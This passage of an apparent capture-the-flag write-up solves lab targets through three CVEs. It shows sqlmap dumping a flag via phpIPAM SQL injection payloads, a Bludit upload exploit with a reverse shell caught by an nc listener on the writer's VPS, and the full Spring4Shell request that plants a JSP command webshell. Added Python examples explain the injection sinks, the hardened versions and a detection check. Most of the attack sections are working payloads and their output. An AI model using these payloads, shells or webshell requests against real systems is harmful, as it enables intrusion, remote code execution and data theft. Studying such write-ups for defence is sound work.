action=add&table=users`where 1=(updatexml(1,concat(0x3a,(*)),1))#
0x03 Run the saved request straight through sqlmap
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r 44.txt --dbms mysql -D phpipam -T flag --dump
(sqlmap banner: {1.7.2#stable} https://sqlmap.org)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:04:45 /2023-11-13/
[22:04:45] [INFO] parsing HTTP request from '44.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
[22:04:46] [INFO] testing connection to the target URL
[22:04:46] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: inline query
Title: Generic inline queries
Payload: action=add&table=users`where 1=(updatexml(1,concat(0x3a,((SELECT CONCAT(CONCAT(0x716a717871,(CASE WHEN (1877=1877) THEN 0x31 ELSE 0x30 END)),0x716a626271)))),1))#
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (ELT)
Payload: action=add&table=users`where 1=(updatexml(1,concat(0x3a,(ELT(7364=7364,6803))),1))#
Type: error-based
Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
Payload: action=add&table=users`where 1=(updatexml(1,concat(0x3a,(GTID_SUBSET(CONCAT(0x716a717871,(SELECT (ELT(9718=9718,1))),0x716a626271),9718))),1))#
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: action=add&table=users`where 1=(updatexml(1,concat(0x3a,((SELECT 9328 FROM (SELECT(SLEEP(5)))EiHc))),1))#
---
[22:04:46] [INFO] testing MySQL
[22:04:46] [INFO] confirming MySQL
[22:04:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:04:47] [INFO] fetching columns for table 'flag' in database 'phpipam'
[22:04:47] [INFO] retrieved: 'flag'
[22:04:47] [INFO] retrieved: 'varchar(1024)'
[22:04:47] [INFO] fetching entries for table 'flag' in database 'phpipam'
[22:04:48] [INFO] retrieved: 'flag{93392325-5cb1-498e-a5fa-8da03b67af4e}'
Database: phpipam
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{93392325-5cb1-498e-a5fa-8da03b67af4e} |
+--------------------------------------------+
[22:04:48] [INFO] table 'phpipam.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/eci-2zeaq9cnps2xi0xscgja.cloudeci1.ichunqiu.com/dump/phpipam/flag.csv'
[22:04:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zeaq9cnps2xi0xscgja.cloudeci1.ichunqiu.com'
[22:04:48] [WARNING] your sqlmap version is outdated
[*] ending @ 22:04:48 /2023-11-13/
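An added example, serving both sqlmap sections above (ZZCMS CVE-2021-40280 and phpIPAM CVE-2019-16692), that is not code from either project or the write-up. It recreates the two sink shapes on an in-memory SQLite database: an id[] array joined into an IN (...) list, and a table name spliced inside backticks. Each vulnerable builder sits beside its hardened form. The schema and rows are constructed; MySQL's updatexml() does not exist in SQLite, so the identifier-sink demo uses a UNION instead of the error-based payload captured above, and `--` instead of MySQL's `#` comment.

```python
import sqlite3

# Assumption: the identifiers the application is allowed to query.
ALLOWED_TABLES = {"users", "dl"}


def setup() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the CMS database (not the real schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE dl(id INTEGER PRIMARY KEY, email TEXT);
        INSERT INTO dl VALUES (0, 'a@example.invalid'), (1, 'b@example.invalid'), (2, 'c@example.invalid');
        CREATE TABLE users(id INTEGER, name TEXT);
        INSERT INTO users VALUES (1, 'admin');
        CREATE TABLE flag(flag TEXT);
        INSERT INTO flag VALUES ('flag{example}');
    """)
    return con


def dl_sendmail_vulnerable(con, ids: list) -> list:
    """Value sink, the id[] pattern of CVE-2021-40280: array elements are joined
    straight into the SQL text, so `1 ) OR 1=1 --` rewrites the WHERE clause."""
    sql = "SELECT email FROM dl WHERE id IN (" + ",".join(ids) + ")"
    return [row[0] for row in con.execute(sql)]


def dl_sendmail_hardened(con, ids: list) -> list:
    """Same query with the values bound: non-integers are rejected up front and
    the remainder travel as parameters, never as SQL text."""
    nums = [int(i) for i in ids]  # ValueError on '1 ) OR 1=1 --'
    marks = ",".join("?" * len(nums))
    return [row[0] for row in con.execute(f"SELECT email FROM dl WHERE id IN ({marks})", nums)]


def filter_result_vulnerable(con, table: str) -> list:
    """Identifier sink, the `table` pattern of CVE-2019-16692: the name is spliced
    inside backticks, so a value containing a backtick closes the identifier and
    everything after it is parsed as SQL."""
    return con.execute(f"SELECT * FROM `{table}`").fetchall()


def filter_result_hardened(con, table: str) -> list:
    """Identifiers cannot be bound as parameters; the only safe option is an
    allowlist, after which quoting is cosmetic."""
    if table not in ALLOWED_TABLES:
        raise ValueError(f"unknown table: {table!r}")
    return con.execute(f'SELECT * FROM "{table}"').fetchall()


if __name__ == "__main__":
    con = setup()
    print(dl_sendmail_vulnerable(con, ["0", "1 ) OR 1=1 --"]))
    print(filter_result_vulnerable(con, "users` UNION SELECT flag, 1 FROM flag -- "))
```

The two sinks fail differently and need different fixes: values can be parameterised, identifiers cannot, so for the phpIPAM shape an allowlist (or a lookup from a fixed mapping) is the whole defence. Parameterising the values also removes the time-based channel sqlmap used against ZZCMS, since SLEEP() can no longer reach the parser.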
CVE-2019-16113
Target description: In Bludit <= 3.9.2 an attacker can upload a file to a chosen path by tailoring the uuid value, and then execute arbitrary code remotely through bl-kernel/ajax/upload-images.php
0x01 Download the PoC https://github.com/hg8/CVE-2019-16113-PoC/blob/master/CVE-2019-16113.py, set the username and password to admin / 123456, and point the reverse-shell command at your own VPS
0x02 Start a listener on the VPS, run the PoC, get the shell and read the flag
[root@hk5LXA7VR9G6 ~]# nc -lvvp 8000
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 39.106.20.178.
Ncat: Connection from 39.106.20.178:20729.
bash: cannot set terminal process group (36): Inappropriate ioctl for device
bash: no job control in this shell
www-data@engine-2:/var/www/html/bl-content/tmp$ cat /flag
cat /flag
flag{74251d5d-057a-424f-b755-4be726841e07}www-data@engine-2:/var/www/html/bl-content/tmp$ ^C
[root@hk5LXA7VR9G6 ~]# ^C
CVE-2022-22965
Target description:
Spring Framework is the foundational open-source framework in Spring, intended to reduce the difficulty and length of Java enterprise application development. On 31 March 2022 VMware Tanzu published a vulnerability report: Spring Framework has a remote code execution vulnerability, and Spring MVC or Spring WebFlux applications running on JDK 9+ may be exposed to RCE through data binding.
0x01 Take a public PoC and send it with Burp Suite. The five class.module.classLoader.resources.context.parent.pipeline.first.* parameters are bound onto Tomcat's AccessLogValve, so the access log is written to webapps/ROOT/tomcatwar.jsp; the c1, c2 and suffix request headers are substituted into the log pattern through its %{name}i directives, which is what turns the log line into a JSP webshell.
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: eci-2zeaw7dgcori1fi9cf6p.cloudeci1.ichunqiu.com:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
0x02 http://url/tomcatwar.jsp?pwd=j&cmd=cat%20/flag returns the flag (the first query parameter follows ?, not &)
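An added example (not from the write-up or any PoC) that takes the request above apart: it pulls the AccessLogValve settings out of the query string, expands the %{name}i header directives the way the valve does for each request, so you can see the JSP that ends up on disk and where, and gives a detection check for the probe. The request target and the three header values are copied from the request above; everything else is an assumption of this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."

# Constructed from the request above: the request target and the three headers
# that the log pattern references with %{name}i.
SAMPLE_TARGET = "/?" + "&".join(PREFIX + p for p in (
    "pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di",
    "suffix=.jsp",
    "directory=webapps/ROOT",
    "prefix=tomcatwar",
    "fileDateFormat=",
))
SAMPLE_HEADERS = {"c1": "Runtime", "c2": "<%", "suffix": "%>//"}


def valve_settings(request_target: str) -> dict:
    """Pull the AccessLogValve properties that the data-binding payload sets."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return {k[len(PREFIX):]: v[0] for k, v in params.items() if k.startswith(PREFIX)}


def expand_header_directives(pattern: str, headers: dict) -> str:
    """Expand the %{name}i (request-header) directives of a Tomcat access-log
    pattern the way the valve does per request; that is how the c1/c2/suffix
    headers turn the log line into a JSP. Missing headers log as '-'."""
    return re.sub(r"%\{([^}]+)\}i", lambda m: headers.get(m.group(1), "-"), pattern)


def log_file_path(settings: dict) -> str:
    """Where the valve writes: directory/prefix + fileDateFormat + suffix.
    An empty fileDateFormat is what makes the name a stable tomcatwar.jsp."""
    return f"{settings['directory']}/{settings['prefix']}{settings['fileDateFormat']}{settings['suffix']}"


def is_spring4shell_probe(request_target: str) -> bool:
    """Detection: any class.module.classLoader.* parameter is a binding attempt
    against the class loader and has no legitimate use in form data."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return any(k.startswith("class.module.classLoader") for k in params)


if __name__ == "__main__":
    s = valve_settings(SAMPLE_TARGET)
    print(log_file_path(s))
    print(expand_header_directives(s["pattern"], SAMPLE_HEADERS))
```

The headers are needed because `<%` and `%>` cannot be placed in the pattern directly without the valve interpreting the percent signs; routing them through %{c2}i and %{suffix}i sidesteps that. The detection function is deliberately broad: the vendor fix (Spring 5.3.18/5.2.20) blocks the class.module path in the binder, and on the wire there is no benign reason for a client to send those names.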